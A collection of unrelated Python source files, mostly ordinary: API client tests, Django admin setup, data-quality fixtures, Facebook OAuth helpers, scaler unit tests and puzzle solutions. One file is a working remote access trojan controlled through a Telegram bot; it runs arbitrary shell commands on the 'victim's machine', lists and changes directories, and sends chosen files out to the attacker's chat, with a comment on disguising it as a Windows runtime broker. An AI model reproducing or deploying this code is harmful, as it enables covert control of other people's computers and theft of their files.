request_mock.assert_requested("get", "/v2/addresses/%s" % TEST_RESOURCE_ID)
assert isinstance(resource, telnyx.Address)
def test_is_creatable(self, request_mock):
resource = telnyx.Address.create(
name="my-profile",
business_name="Acme Inc",
country_code="US",
street_address="311 W Superior St",
first_name="John",
last_name="Doe",
locality="Chicago",
)
request_mock.assert_requested("post", "/v2/addresses")
assert isinstance(resource, telnyx.Address)
def test_is_deletable(self, request_mock):
resource = telnyx.Address.retrieve(TEST_RESOURCE_ID)
resource.delete()
request_mock.assert_requested("delete", "/v2/addresses/%s" % TEST_RESOURCE_ID)
|
486331
|
from PyObjCTools import NibClassBuilder, AppHelper
NibClassBuilder.extractClasses("MainMenu")
import AppController
AppHelper.runEventLoop()
|
486340
|
from pydantic import Field
from typing import Optional
from datetime import date, datetime, timedelta
from seedwork.domain.rules import BusinessRule
from modules.bidding.domain.value_objects import Bid
from seedwork.domain.value_objects import Money
class PlacedBidMustBeGreaterThanCurrentWinningBid(BusinessRule):
__message = "Placed bid must be greater than {current_price}"
bid: Bid
current_price: Money
def is_broken(self) -> bool:
return self.bid.price <= self.current_price
def get_message(self) -> str:
return self.__message.format(current_price=self.current_price)
class BidCanBeRetracted(BusinessRule):
__message = "Bid cannot be retracted"
listing_ends_at: datetime
bid_placed_at: datetime
now: datetime = Field(default_factory=datetime.utcnow)
def is_broken(self) -> bool:
time_left_in_listing = self.now - self.listing_ends_at
time_since_placed = self.now - self.bid_placed_at
less_than_12_hours_before_bidding_ends = time_left_in_listing < timedelta(
hours=12
)
less_than_1_hour_since_bid_was_placed = time_since_placed < timedelta(hours=1)
return (
less_than_12_hours_before_bidding_ends
and less_than_1_hour_since_bid_was_placed
)
class ListingCanBeCancelled(BusinessRule):
__message = "Listing cannot be cancelled"
time_left_in_listing: timedelta
no_bids_were_placed: int
def is_broken(self) -> bool:
can_be_cancelled = self.time_left_in_listing > timedelta(hours=12) or (
self.time_left_in_listing <= timedelta(hours=12)
and self.no_bids_were_placed
)
return not can_be_cancelled
|
486359
|
import os
from ttp import ttp
from typing import Optional, List, Dict
def get_template(
path: Optional[str] = None,
platform: Optional[str] = None,
command: Optional[str] = None,
yang: Optional[str] = None,
misc: Optional[str] = None,
):
"""
Function to locate template file and return it's content
**Attributes**
* path (str) - OS path to template to load
* platform (str) - name of the platform to load template for
* command (str) - command to load template for
* yang (str) - name of YANG module to load template for
* misc (str) - OS path to template within repository misc folder
**Valid combinations of template location**
``path`` attribute is always more preferred
* ``path="./misc/foo/bar.txt"``
* ``platfrom="cisco_ios", command="show version"``
* ``yang="ietf-interfaces", platform="cisco_ios"``
* ``misc="foo_folder/bar_template.txt"``
"""
# form path to template file
if path:
if path.strip().startswith("ttp://"):
path = path.strip()[6:]
elif platform and command:
platform = platform.lower()
command = command.lower()
command = command.replace("|", "pipe")
for symbol in [" "]:
platform = platform.replace(symbol, "_")
command = command.replace(symbol, "_")
path = "platform/{}_{}.txt".format(platform, command)
elif platform and yang:
platform = platform.lower()
yang = yang.lower()
for symbol in [" "]:
platform = platform.replace(symbol, "_")
yang = yang.replace(symbol, "_")
path = "yang/{}_{}.txt".format(yang, platform)
elif misc:
path = "misc/{}".format(misc)
else:
return None
template_filename = os.path.join(os.path.dirname(__file__), path)
# open template file and return content
with open(template_filename, "r") as f:
return f.read()
def parse_output(
data: str,
platform: Optional[str] = None,
command: Optional[str] = None,
path: Optional[str] = None,
yang: Optional[str] = None,
misc: Optional[str] = None,
structure: Optional[str] = "list",
template_vars: Optional[Dict] = {},
):
"""
Function to load template text and parse data provided
**Attributes**
* data (str) - data to parse
* path (str) - OS path to template to load
* platform (str) - name of the platform to load template for
* command (str) - command to load template for
* yang (str) - name of YANG module to load template for
* misc (str) - OS path to template within repository misc folder
* structure (str) - results structure list, dictionary or flat_list
* template_vars (dict) - variables to load in template object
**Valid combinations of template location**
``path`` attribute is always more preferred
* ``path="./misc/foo/bar.txt"``
* ``platfrom="cisco_ios", command="show version"``
* ``yang="ietf-interfaces", platform="cisco_ios"``
* ``misc="foo_folder/bar_template.txt"``
"""
# get template text
template = get_template(
platform=platform, command=command, path=path, yang=yang, misc=misc
)
# create parser object
parser = ttp(data=data, template=template, vars=template_vars)
# parse and return results
parser.parse(one=True)
return parser.result(structure=structure)
|
486437
|
from django.contrib import admin
from . import models
from django.conf import settings
admin.site.register(models.OfferCategory)
class OfferAdmin(admin.ModelAdmin):
if settings.MULTI_VENDOR:
list_display = ['title', 'total_vendors', 'starts_from', 'ends_at']
list_filter = ('vendor',)
else:
list_display = ['title', 'create_at', 'starts_from', 'ends_at']
list_per_page = 25
search_fields = ['title', 'description', 'ends_at']
readonly_fields = ['big_banner_tag', 'small_banner_tag']
# autocomplete_fields = ['category']
admin.site.register(models.Offer, OfferAdmin)
|
486461
|
import pytest
# TODO: Move these fixtures to integration tests
from great_expectations.data_context.util import file_relative_path
@pytest.fixture
def bobster_columnar_table_multi_batch_normal_mean_5000_stdev_1000():
verbose_profiler_config_file_path: str = file_relative_path(
__file__, "bobster_user_workflow_verbose_profiler_config.yml"
)
verbose_profiler_config: str
with open(verbose_profiler_config_file_path) as f:
verbose_profiler_config = f.read()
expectation_suite_name_bootstrap_sampling_method: str = (
"bobby_columnar_table_multi_batch_bootstrap_sampling_method"
)
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_mean_value: int = (
5000
)
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_std_value: float = (
1.0e3
)
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_num_stds: float = (
3.00
)
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_min_value_mean_value: int = round(
float(
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_mean_value
)
- (
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_num_stds
* my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_std_value
)
)
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_max_value_mean_value: int = round(
float(
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_mean_value
)
+ (
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_num_stds
* my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_std_value
)
)
return {
"profiler_config": verbose_profiler_config,
"test_configuration_bootstrap_sampling_method": {
"expectation_suite_name": expectation_suite_name_bootstrap_sampling_method,
"expect_table_row_count_to_be_between_mean_value": my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_mean_value,
"expect_table_row_count_to_be_between_min_value_mean_value": my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_min_value_mean_value,
"expect_table_row_count_to_be_between_max_value_mean_value": my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_max_value_mean_value,
},
}
|
486482
|
import telebot, os
from telebot.types import Message as tele_message
from subprocess import check_output
# root_dir = os.path.dirname(__file__)
API_KEY = 'your_bot_key/token'
CHAT_ID = 0 # int - attacker's user id
# to find user id, start the bot, and message this bot with /start
# password = 'password' // password is reserved for future work
help_message = '''
Remote Code Executor BOT
Written by <NAME>
https://github.com/dmdhrumilmistry
-------------------------
command description
-------------------------
/start get chat id and user details
/help get help menu
/exec execute command on victim's machine
/cd <path> change directory
/ls list file and folders of current working directory
/download download file from the victims machine to attacker's via telegram chat
'''
bot = telebot.TeleBot(API_KEY)
def get_victim():
return check_output("whoami",shell=True).decode("utf-8")
def inform_attacker():
'''
informs attacker that the victim machine is up
'''
message = f'{get_victim()} has been pawned and up'
bot.send_message(CHAT_ID, text=message)
def get_user_details(message:tele_message):
'''
returns messenger's details
'''
return f'ID : {message.from_user.id}\n Name :{message.from_user.full_name}\n[UserName] {message.from_user.username}\nIS BOT : {message.from_user.is_bot}'
def validate_request(message:tele_message) -> bool:
'''
returns True is if request is from hacker, else False
'''
if message.from_user.id != int(CHAT_ID):
alert_message = f'[!] Intruder Alert!!\n{get_user_details(message)}\nTried Command : {message.text}\n\nDetailed Information :{message}'
bot.send_message(chat_id=CHAT_ID, text=alert_message)
bot.send_message(chat_id=message.from_user.id, text='Not Authorized !!')
return False
return True
@bot.message_handler(commands=['start'])
def start(message:tele_message):
'''
start conversation
'''
chat_id = message.chat.id
reply_message = get_user_details()
bot.send_message(chat_id, reply_message)
if CHAT_ID:
bot.send_message(CHAT_ID, reply_message)
@bot.message_handler(commands=['exec'])
def execute(message:tele_message):
'''
executes and returns result to the attacker
'''
if not validate_request(message):
return
cmd = message.text.split('/exec')[-1].strip()
try:
result = check_output(cmd, shell=True).decode('utf-8')
except Exception as e:
result = f'Exception Occurred : {e}'
bot.send_message(chat_id=CHAT_ID, text=result)
@bot.message_handler(commands=['help'])
def help(message:tele_message):
'''
prints help
'''
if validate_request(message):
bot.send_message(chat_id=CHAT_ID, text=help_message)
@bot.message_handler(commands=['cd'])
def cd(message:tele_message):
'''
change current working directory
'''
cd_dir = message.text.split('/cd')[-1].strip()
if not validate_request(message):
return
os.chdir(cd_dir)
bot.send_message(CHAT_ID, text=f'Current Directory : {os.getcwd()}')
@bot.message_handler(commands=['ls'])
def ls(message:tele_message):
'''
replies with list of all the folders and files in the dir to the attacker
'''
if not validate_request(message):
return
dirs = '\n'.join(os.listdir('.'))
bot.send_message(chat_id=CHAT_ID, text=dirs)
@bot.message_handler(commands=['download'])
def download_file(message:tele_message):
'''
downloads file from victim's machine to attacker's machine
'''
if not validate_request(message):
return
file_path = message.text.split('/download')[-1].strip()
if os.path.isfile(file_path):
with open(file_path, 'rb') as file:
file_data = file.read()
bot.send_document(chat_id=CHAT_ID, data=file_data, caption=f'[*] {file_path} downloaded from {get_victim()}')
else:
bot.send_message(chat_id=CHAT_ID, text=f'[!] {file_path} does not exists.')
def start_bot():
'''
starts bot and informs hacker that victim's machine is up
'''
inform_attacker()
bot.polling()
if __name__ == '__main__':
# for windows create malware with runtime broker
# while packaging remove print statements
start_bot()
|
486484
|
import csv
from core.nn.token_mapper import RegexTokenMapping, ExactTokenMapping, TokenMapper, HashTokenMapping
from core.utils.core_nlp import SimpleSentence
from core.utils.data import NearNeighborLookup
from core.vectorspace.word_embedding import Glove
import json
import random
dataset_file = "/home/justin/Eloquent/Datasets/idk/idkdataset.tsv"
input_file = "/home/justin/Eloquent/Datasets/idk/idkdatasettest_small.tsv"
output_file = "/home/justin/Eloquent/Datasets/idk/idk_dataset_specificity_test_in.jsonl"
bonus = 0.2
reward = 0.20
estimated_time = 75
datapoints_per_batch = 10
token_mappings = [
RegexTokenMapping("^[0-9]$", 3, "NUM_1"),
RegexTokenMapping("^[0-9]{2}$", 3, "NUM_2"),
RegexTokenMapping("^[0-9]{3}$", 3, "NUM_3"),
RegexTokenMapping("^[0-9]+$", 3, "NUM_MANY"),
RegexTokenMapping("^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$", 3, "EMAIL"),
ExactTokenMapping(["<SOS>", "<EOS>"]),
]
print('Adding {} token mappings'.format(len(token_mappings)))
glove = Glove.from_binary().with_new_token_mapper(
token_mapper=TokenMapper(token_mappings, [HashTokenMapping(10)])
)
question_list_pos = []
question_list_neg = []
do_sentiment = False
with open(dataset_file, "r") as f:
reader = csv.reader(f, delimiter="\t")
for line in reader:
if (not do_sentiment) or line[2] == "pos":
question_list_pos.append(line[0])
else:
question_list_neg.append(line[0])
sslist_pos = [SimpleSentence.from_text(sentence) for sentence in question_list_pos]
nns_pos = NearNeighborLookup.from_sentences(sslist_pos, glove)
if do_sentiment:
sslist_neg = [SimpleSentence.from_text(sentence) for sentence in question_list_neg]
nns_neg = NearNeighborLookup.from_sentences(sslist_neg, glove)
response_sets = []
with open(input_file, "r") as f:
reader = csv.reader(f, delimiter="\t")
for line in reader:
if (not do_sentiment) or line[2] == "pos":
neighbors = nns_pos.find_neighbors(SimpleSentence.from_text(line[0]), 2, ignore_self=True)
sentiment = "pos"
else:
neighbors = nns_neg.find_neighbors(SimpleSentence.from_text(line[0]), 2, ignore_self=True)
sentiment = "neg"
neighbors = [" ".join(entry.original_texts()) for entry in neighbors]
response_sets.append((line[0], neighbors, line[1], sentiment))
turk_inputs = []
i = 0
for response in response_sets:
prompts = response[1].copy()
prompts.append(response[0])
random.shuffle(prompts)
json_object = {
"id": i,
"prompts": prompts,
"response": response[2],
"correct": prompts.index(response[0]),
"sentiment": response[3]
}
turk_inputs.append(json_object)
i += 1
random.shuffle(turk_inputs)
with open(output_file, "w+") as f:
for i in range(len(response_sets)//datapoints_per_batch):
turk_input = turk_inputs[datapoints_per_batch * i: datapoints_per_batch * (i + 1)]
json_object = {
"input": turk_input,
"bonus": bonus,
"reward": reward,
"estimatedTime": estimated_time
}
f.write(json.dumps(json_object) + "\n")
|
486492
|
class Submarine:
depth = 0
horizontal_pos = 0
def down(self, depth):
self.depth += depth
def up(self, depth):
self.depth -= depth
def forward(self, distance):
self.horizontal_pos += distance
def get_depth(self):
return self.depth
def get_horizontal_pos(self):
return self.horizontal_pos
def dive(self, input):
with open(input, "r") as f:
for line in f:
(direction, value) = line.split(" ")
value = int(value)
if direction == "down":
self.down(value)
elif direction == "up":
self.up(value)
elif direction == "forward":
self.forward(value)
else:
raise Exception(f"Unknown direction!")
def get_Star1():
submarine = Submarine()
submarine.dive("input.txt")
result = submarine.get_depth() * submarine.get_horizontal_pos()
print(f"Result for first star: {result}")
class Aiming_Submarine:
depth = 0
horizontal_pos = 0
aim = 0
def down(self, depth):
self.aim += depth
def up(self, depth):
self.aim -= depth
def forward(self, distance):
self.horizontal_pos += distance
self.depth += distance * self.aim
def get_depth(self):
return self.depth
def get_horizontal_pos(self):
return self.horizontal_pos
def dive(self, input):
with open(input, "r") as f:
for line in f:
(direction, value) = line.split(" ")
value = int(value)
if direction == "down":
self.down(value)
elif direction == "up":
self.up(value)
elif direction == "forward":
self.forward(value)
else:
raise Exception(f"Unknown direction!")
def get_Star2():
submarine = Aiming_Submarine()
submarine.dive("input.txt")
result = submarine.get_depth() * submarine.get_horizontal_pos()
print(f"Result for second star: {result}")
get_Star1()
get_Star2()
|
486516
|
from datetime import datetime
import base64
import hashlib
import hmac
import logging
import requests
import time
import urlparse
from rmc.server.app import app
import rmc.server.api.api_util as api_util
import rmc.shared.util as util
# A long token normally lasts for 60 days
FB_FORCE_TOKEN_EXPIRATION_DAYS = 57
USED_AUTH_CODE_MSG = 'This authorization code has been used.'
def code_for_token(code, config, cmd_line_debug=False):
"""Returns a dictionary containing the user's Facebook access token and
seconds until it expires from now
See https://developers.facebook.com/blog/post/2011/05/13/how-to--handle-expired-access-tokens/
Right now, the resulting token is a short-lived token (~2 hours). But it's
possible that this is wrong and that it should be a long-term token
instead. See https://developers.facebook.com/bugs/341793929223330/
Args:
code: The code we get from their fb_signed_request
Returns {
'access_token': '<PASSWORD>',
'expires': 6200,
}
"""
# Since we're exchanging a client-side token, redirect_uri should be ''
params = {
'client_id': config['FB_APP_ID'],
'redirect_uri': '',
'client_secret': config['FB_APP_SECRET'],
'code': code,
}
resp = requests.get('https://graph.facebook.com/oauth/access_token',
params=params)
if resp.status_code != 200:
err = util.json_loads(resp.text)
if (err.get('error').get('message') == USED_AUTH_CODE_MSG and
err.get('error').get('code') == 100):
logging.info('code_for_token failed (%d) with text:\n%s' % (
resp.status_code, resp.text))
else:
logging.warn('code_for_token failed (%d) with text:\n%s' % (
resp.status_code, resp.text))
result = dict(urlparse.parse_qsl(resp.text))
if cmd_line_debug:
print "result dict:"
print result
return resp
return result
def get_access_token_info(access_token):
"""Returns info about the given Facebook access token.
Verifies that the access token was issued for Flow. This prevents an
attacker from hijacking a user's Flow account by providing a valid access
token issued for another FB app.
For return data, see (https://developers.facebook.com/docs/facebook-login
/manually-build-a-login-flow/#confirm)
"""
res = requests.get('https://graph.facebook.com/debug_token'
'?input_token=%s&access_token=%s|%s' % (
access_token,
app.config['FB_APP_ID'],
app.config['FB_APP_SECRET']))
if not res.ok or not res.json.get('data'):
logging.error('Failed verifying FB access token. FB response: %s' %
res.json)
raise api_util.ApiBadRequestError('Failed verifying FB access token.')
return res.json['data']
# TODO(Sandy): Find out how often a new token is issued
def token_for_long_token(short_token, config, cmd_line_debug=False):
"""
Returns a dictionary containing the user's long Facebook access token and
seconds until it expires from now
The resulting tokens should last 60 days. Though making the same request
within a short period of time (eg. minutes) won't result in a new token.
Args:
short_token: The short-lived token we're exchanging
Returns {
'access_token': 'token-<PASSWORD>-bl<PASSWORD>',
'expires': 5184000,
}
"""
# Since we're exchanging a client-side token, redirect_uri should be ''
params = {
'grant_type': 'fb_exchange_token',
'client_id': config['FB_APP_ID'],
'client_secret': config['FB_APP_SECRET'],
'fb_exchange_token': short_token,
}
resp = requests.get('https://graph.facebook.com/oauth/access_token',
params=params)
if resp.status_code != 200:
# TODO(Sandy): See if this is too verbose
logging.warn('token_for_long_token failed (%d) with text:\n%s' % (
resp.status_code, resp.text))
result = dict(urlparse.parse_qsl(resp.text))
if cmd_line_debug:
print "result dict:"
print result
return resp
return result
def base64_url_decode(inp):
padding_factor = (4 - len(inp) % 4) % 4
inp += '=' * padding_factor
return base64.b64decode(unicode(inp)
.translate(dict(zip(map(ord, u'-_'), u'+/'))))
def parse_signed_request(signed_request, secret):
"""
Returns a dict of the the Facebook signed request object
See https://developers.facebook.com/docs/authentication/signed_request/
"""
l = signed_request.split('.', 2)
encoded_sig = l[0]
payload = l[1]
sig = base64_url_decode(encoded_sig)
data = util.json_loads(base64_url_decode(payload))
if data.get('algorithm').upper() != 'HMAC-SHA256':
logging.error('Unknown algorithm during signed request decode')
return None
expected_sig = (hmac.new(secret, msg=payload, digestmod=hashlib.sha256)
.digest())
if sig != expected_sig:
return None
return data
# TODO(Sandy): Remove config parameter when Flask re-factoring is done
def get_fb_data(signed_request, config):
"""
Get FB access token and expiry information from the Facebook signed request
A long-lived token should be returned (60 days expiration), if everything
went smoothly.
Returns {
'access_token': '<PASSWORD>',
'expires_on': 5184000,
'fbid': 123456789,
}
"""
# Validate against Facebook's signed request
fbsr_data = parse_signed_request(signed_request, config['FB_APP_SECRET'])
# TODO(Sandy): Maybe move the validation somewhere else since it can raise
# an Exception
if fbsr_data is None or not fbsr_data.get('user_id'):
logging.warn('Could not parse Facebook signed request (%s)'
% signed_request)
raise Exception('Could not parse Facebook signed request (%s)'
% signed_request)
# Fetch long token from Facebook
# TODO(Sandy): Migrate to Flask sessions so null tokens won't be a problem
fb_access_token = None
fb_access_token_expiry_date = None
is_invalid = True
code = fbsr_data.get('code')
if code:
result_dict = code_for_token(code, config)
short_access_token = result_dict.get('access_token')
if short_access_token:
result_dict = token_for_long_token(short_access_token, config)
long_access_token = result_dict.get('access_token')
token_expires_in = result_dict.get('expires')
if long_access_token and token_expires_in:
fb_access_token = long_access_token
fb_access_token_expiry_date = datetime.fromtimestamp(
int(time.time()) + int(token_expires_in) - 10)
is_invalid = False
else:
logging.warn('Failed to exchange (%s) for long access token'
% short_access_token)
else:
logging.info('Failed to exchange code (%s) for token' % code)
else:
# Shouldn't happen, Facebook messed up
logging.warn('No "code" field in fbsr. Blame FB')
return {
'access_token': fb_access_token,
'expires_on': fb_access_token_expiry_date,
'fbid': fbsr_data['user_id'],
'is_invalid': is_invalid,
}
class FacebookOAuthException(Exception):
'''
Invalid Facebook token (expired or just plain invalid):
https://developers.facebook.com/blog/post/2011/05/13/how-to--handle-expired-access-tokens/
'''
pass
def get_friend_list(token):
'''
Return a list of fbids for the Facebook user associated with token
'''
fbid_list = []
params = {
'access_token': token,
}
url = 'https://graph.facebook.com/me/friends'
while url is not None:
resp = requests.get(url, params=params)
resp_dict = util.json_loads(resp.text)
if 'error' in resp_dict:
if resp_dict.get('error').get('type') == 'OAuthException':
raise FacebookOAuthException()
raise Exception(resp.text)
if 'data' in resp_dict:
for entry in resp_dict['data']:
fbid_list.append(entry['id'])
else:
raise Exception('"data" not in dict (%s)' % resp_dict)
url = resp_dict.get('paging', {}).get('next')
return fbid_list
|
486538
|
from setuptools import setup
setup(
name = "pocket", # pip install pocket
description = "api wrapper for getpocket.com",
#long_description=open('README.md', 'rt').read(),
# version
# third part for minor release
# second when api changes
# first when it becomes stable someday
version = "0.3.7",
author = '<NAME>',
author_email = "<EMAIL>",
url = 'http://github.com/tapanpandita/pocket/',
license = 'BSD',
# as a practice no need to hard code version unless you know program wont
# work unless the specific versions are used
install_requires = ["requests", ],
py_modules = ["pocket"],
zip_safe = True,
)
# TODO: Do all this and delete these lines
# register: Create an accnt on pypi, store your credentials in ~/.pypirc:
#
# [pypirc]
# servers =
# pypi
#
# [server-login]
# username:<username>
# password:<<PASSWORD>>
#
# $ python setup.py register # one time only, will create pypi page for pocket
# $ python setup.py sdist --formats=gztar,zip upload # create a new release
#
|
486541
|
from django.db import models
class AnyFileField(models.FileField):
"""
The standard Django `~django.forms.FileField` with a `~django.forms.ClearableFileInput` widget.
"""
pass
class AnyImageField(models.ImageField):
"""
The standard Django `~django.forms.ImageField` with a `~django.forms.ClearableFileInput` widget.
"""
pass
|
486553
|
from pydantic import BaseModel
from typing import Dict
class Config(BaseModel):
conditions: Dict[str, str]
|
486567
|
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--remote', action='store_true', help='the code run on a server')
parser.add_argument('--num-gpu', type=int, default=0, help='the number of the gpu to use')
parser.add_argument('--epochs', type=int, default=200, help='train epochs')
parser.add_argument('--batch-size', type=int, default=16, help='batch size')
parser.add_argument('--filename', type=str, default='pems04')
parser.add_argument('--train-ratio', type=float, default=0.6, help='the ratio of training dataset')
parser.add_argument('--valid-ratio', type=float, default=0.2, help='the ratio of validating dataset')
parser.add_argument('--his-length', type=int, default=12, help='the length of history time series of input')
parser.add_argument('--pred-length', type=int, default=12, help='the length of target time series for prediction')
parser.add_argument('--sigma1', type=float, default=0.1, help='sigma for the semantic matrix')
parser.add_argument('--sigma2', type=float, default=10, help='sigma for the spatial matrix')
parser.add_argument('--thres1', type=float, default=0.6, help='the threshold for the semantic matrix')
parser.add_argument('--thres2', type=float, default=0.5, help='the threshold for the spatial matrix')
parser.add_argument('--lr', type=float, default=2e-3, help='learning rate')
parser.add_argument('--log', action='store_true', help='if write log to files')
args = parser.parse_args()
|
486569
|
from itertools import chain
def radixsort(lst):
is_sorted = lambda l: all([a < b for a, b in zip(l[:-1], l[1:])])
shift = 1
zeroes = []
ones = []
while not is_sorted(lst.lst):
orig = lst.lst[:]
while len(orig) != 0:
# take an item out of the list
item = orig.pop(0)
# put it in the right bucket
if (item.i & shift) == 0:
zeroes.append(item)
else:
ones.append(item)
# copy the items back into the main list
for j, item in enumerate(chain(zeroes, orig, ones)):
lst[j] = item
# for a more simple graph, comment out the line below
lst.log()
#
if is_sorted(lst):
return
lst.log()
shift = shift << 1
zeroes[:] = []
ones[:] = []
|
486580
|
import site # so that ai4water directory is in path
import unittest
import os
import sys
ai4_dir = os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0])))
site.addsitedir(ai4_dir)
import numpy as np
import pandas as pd
from ai4water.preprocessing.transformations import Transformation
from ai4water.tf_attributes import tf
from ai4water.datasets import busan_beach
if 230 <= int(''.join(tf.__version__.split('.')[0:2]).ljust(3, '0')) < 250:
from ai4water.functional import Model
print(f"Switching to functional API due to tensorflow version {tf.__version__}")
else:
from ai4water import Model
df = pd.DataFrame(np.concatenate([np.arange(1, 10).reshape(-1, 1), np.arange(1001, 1010).reshape(-1, 1)], axis=1),
columns=['data1', 'data2'])
def build_and_run(x_transformation, y_transformation,
data, inputs, outputs):
model = Model(model="RandomForestRegressor",
input_features=inputs,
output_features=outputs,
x_transformation=x_transformation,
y_transformation=y_transformation,
verbosity=0)
model.fit(data=data)
x, y = model.training_data(key='junk')
#pred, pred = model.inverse_transform(y, y, key='junk')
pred, index = model.dh_.deindexify(y, key='junk')
pred = pd.DataFrame(pred.reshape(len(pred), model.num_outs), columns=outputs, index=index).sort_index()
return pred
def run_method1(method,
cols=None,
data=None,
**kwargs):
normalized_df1, scaler = Transformation(method=method,
features=cols,
**kwargs)(data,
'fit_transform',
return_key=True)
denormalized_df1 = Transformation(features=cols,
)(normalized_df1,
'inverse',
scaler=scaler['scaler'])
return normalized_df1, denormalized_df1
def run_method2(method,
data=None,
index=None,
**kwargs):
if index:
data.index = pd.date_range("20110101", periods=len(data), freq="D")
scaler = Transformation(method=method,
**kwargs)
normalized_df, scaler_dict = scaler.fit_transform(data, return_key=True)
denormalized_df = scaler.inverse_transform(data=normalized_df, key=scaler_dict['key'])
return data, normalized_df, denormalized_df
def run_method3(method,
data=None,
index=None,
**kwargs):
if index:
data.index = pd.date_range("20110101", periods=len(data), freq="D")
scaler = Transformation(method=method,
**kwargs)
normalized_df3, scaler_dict = scaler(data,
return_key=True)
denormalized_df3 = scaler(what='inverse', data=normalized_df3, key=scaler_dict['key'])
return data, normalized_df3, denormalized_df3
def run_method4(method,data=None, **kwargs):
scaler = Transformation(**kwargs)
normalized_df4, scaler_dict = getattr(scaler, "fit_transform_with_" + method)(
data=data,
return_key=True)
denormalized_df4 = getattr(scaler, "inverse_transform_with_" + method)(data=normalized_df4, key=scaler_dict['key'])
return normalized_df4, denormalized_df4
def run_log_methods(method="log", index=None, insert_nans=True, insert_zeros=False, assert_equality=True,
insert_ones=False):
a = np.random.random((10, 4))
a[0, 0] = np.nan
a[0, 1] = 1.
if insert_nans or insert_zeros:
a[2:4, 1] = np.nan
a[3:5, 2:3] = np.nan
if insert_zeros:
a[5:8, 3] = 0.0
if insert_ones:
a[6, 1] = 1.0
a[9, 2:3] = 1.0
cols = ['data1', 'data2', 'data3', 'data4']
if index is not None:
index = pd.date_range("20110101", periods=len(a), freq="D")
df3 = pd.DataFrame(a, columns=cols, index=index)
_, _ = run_method1(method=method, data=df3.copy())
_, _, dfo2 = run_method2(method=method, data=df3.copy())
_, _, dfo3 = run_method3(method=method, data=df3.copy())
_, dfo4 = run_method4(method=method, data=df3.copy())
if assert_equality:
#assert np.allclose(df3, dfo1, equal_nan=True)
assert np.allclose(df3, dfo2, equal_nan=True)
assert np.allclose(df3, dfo3, equal_nan=True)
assert np.allclose(df3, dfo4, equal_nan=True)
return
class test_Scalers(unittest.TestCase):
def run_method(self, method, cols=None, index=None, assert_equality=False, **kwargs):
cols = ['data1', 'data2'] if cols is None else cols
normalized_df1, denormalized_df1 = run_method1(method, cols, data=df.copy())
orig_data2, normalized_df2, denormalized_df2 = run_method2(method,
index=index,
features=cols,
data=df.copy(),
**kwargs
)
orig_data3, normalized_df3, denormalized_df3 = run_method3(method, index=index,
data=df.copy(),
**kwargs)
normalized_df4, denormalized_df4 = run_method4(method, data=df.copy(),
**kwargs)
if assert_equality:
assert np.allclose(orig_data2, denormalized_df2)
#assert np.allclose(orig_data3, normalized_df3) # todo
if len(cols) < 2:
self.check_features(denormalized_df1)
else:
for i,j,k,l in zip(normalized_df1[cols].values, normalized_df2[cols].values, normalized_df3[cols].values, normalized_df4[cols].values):
for x in [0, 1]:
self.assertEqual(int(i[x]), int(j[x]))
self.assertEqual(int(j[x]), int(k[x]))
self.assertEqual(int(k[x]), int(l[x]))
for a,i,j,k,l in zip(df.values, denormalized_df1[cols].values, denormalized_df2[cols].values, denormalized_df3[cols].values, denormalized_df4[cols].values):
for x in [0, 1]:
self.assertEqual(int(round(a[x])), int(round(j[x])))
self.assertEqual(int(round(i[x])), int(round(j[x])))
self.assertEqual(int(round(j[x])), int(round(k[x])))
self.assertEqual(int(round(k[x])), int(round(l[x])))
def check_features(self, denorm):
for idx, v in enumerate(denorm['data2']):
self.assertEqual(v, 1001 + idx)
def test_get_scaler_from_dict_error(self):
normalized_df1, _ = Transformation()(df, 'fit_transform', return_key=True)
self.assertRaises(ValueError, Transformation(), what='inverse', data=normalized_df1)
return
def test_log_scaler_with_feat(self):
self.run_method("log", cols=["data1"])
return
def test_robust_scaler_with_feat(self):
self.run_method("robust", cols=["data1"], assert_equality=True)
return
def test_minmax_scaler_with_feat(self):
self.run_method("minmax", cols=["data1"], assert_equality=True)
return
def test_minmax_scaler_with_feat_and_index(self):
self.run_method("minmax", cols=["data1"], index=True, assert_equality=True)
def test_maxabs_scaler_with_feat(self):
self.run_method("maxabs", cols=["data1"], assert_equality=True)
def test_zscore_scaler_with_feat(self):
self.run_method("minmax", cols=["data1"], assert_equality=True)
def test_power_scaler_with_feat(self):
self.run_method("maxabs", cols=["data1"], assert_equality=True)
def test_quantile_scaler_with_feat(self):
self.run_method("quantile", cols=["data1"], assert_equality=True, n_quantiles=5)
def test_log_scaler(self):
self.run_method("log", assert_equality=True)
def test_log10_scaler(self):
self.run_method("log10", assert_equality=True)
return
def test_log2_scaler(self):
self.run_method("log2", assert_equality=True)
return
def test_robust_scaler(self):
self.run_method("robust", assert_equality=True)
return
def test_minmax_scaler(self):
self.run_method("minmax", assert_equality=True)
return
def test_maxabs_scaler(self):
self.run_method("maxabs", assert_equality=True)
def test_zscore_scaler(self):
self.run_method("minmax", assert_equality=True)
def test_power_scaler(self):
self.run_method("maxabs", assert_equality=True)
def test_quantile_scaler(self):
self.run_method("quantile", assert_equality=True, n_quantiles=5)
return
def test_log_with_nans(self):
run_log_methods(index=None)
return
def test_log_with_index(self):
run_log_methods("log", True)
return
def test_log10_with_nans(self):
run_log_methods(method='log10', index=None)
return
def test_log10_with_index(self):
run_log_methods("log10", True)
return
def test_log2_with_nans(self):
run_log_methods(method='log2', index=None)
return
def test_log2_with_index(self):
run_log_methods("log2", True)
return
def test_tan_with_nans(self):
run_log_methods("tan", index=None, assert_equality=False)
return
def test_tan_with_index(self):
run_log_methods("tan", True, assert_equality=False)
return
def test_cumsum_with_index(self):
run_log_methods("cumsum", True, insert_nans=False, assert_equality=False)
return
def test_cumsum_with_nan(self):
run_log_methods("cumsum", True, insert_nans=True, assert_equality=False)
return
